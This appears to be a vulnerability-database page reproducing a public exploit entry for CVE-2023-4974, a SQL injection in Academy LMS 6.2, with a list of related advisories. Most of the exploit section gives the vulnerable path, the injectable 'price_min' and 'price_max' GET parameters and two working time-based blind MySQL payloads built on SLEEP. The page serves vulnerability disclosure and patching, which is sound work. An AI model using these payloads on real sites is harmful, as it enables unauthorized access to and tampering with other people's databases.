| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Academy LMS 6.2 SQL Injection Vulnerability | 18 Sep 202300:00 | – | zdt | |
| Creative Item Academy LMS SQL Injection Vulnerability | 14 Sep 202300:00 | – | cnnvd | |
| CVE-2023-4974 | 15 Sep 202302:00 | – | cve | |
| CVE-2023-4974 Academy LMS GET Parameter filter sql injection | 15 Sep 202302:00 | – | cvelist | |
| Academy LMS 6.2 - SQL Injection | 31 Jan 202400:00 | – | exploitdb | |
| Academy LMS 6.2 - SQL Injection | 6 Jun 202603:01 | – | nuclei | |
| CVE-2023-4974 | 15 Sep 202303:15 | – | nvd | |
| Sql injection | 15 Sep 202303:15 | – | prion | |
| CVE-2023-4974 | 23 May 202504:27 | – | redhatcve | |
| CVE-2023-4974 Academy LMS GET Parameter filter sql injection | 15 Sep 202302:00 | – | vulnrichment |
`# Exploit Title: Academy LMS 6.2 - SQL Injection
# Exploit Author: CraCkEr
# Date: 29/08/2023
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/academy/
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4974
# CWE: CWE-89 / CWE-74 / CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /academy/tutor/filter
GET parameter 'price_min' is vulnerable to SQL Injection
GET parameter 'price_max' is vulnerable to SQL Injection
https://website/academy/tutor/filter?searched_word=&searched_tution_class_type%5B%5D=1&price_min=[SQLi]&price_max=[SQLi]&searched_price_type%5B%5D=hourly&searched_duration%5B%5D=0
---
Parameter: price_min (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0
Parameter: price_max (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searched_word=&searched_tution_class_type[]=1&price_min=1&price_max=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&searched_price_type[]=hourly&searched_duration[]=0
---
[-] Done
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation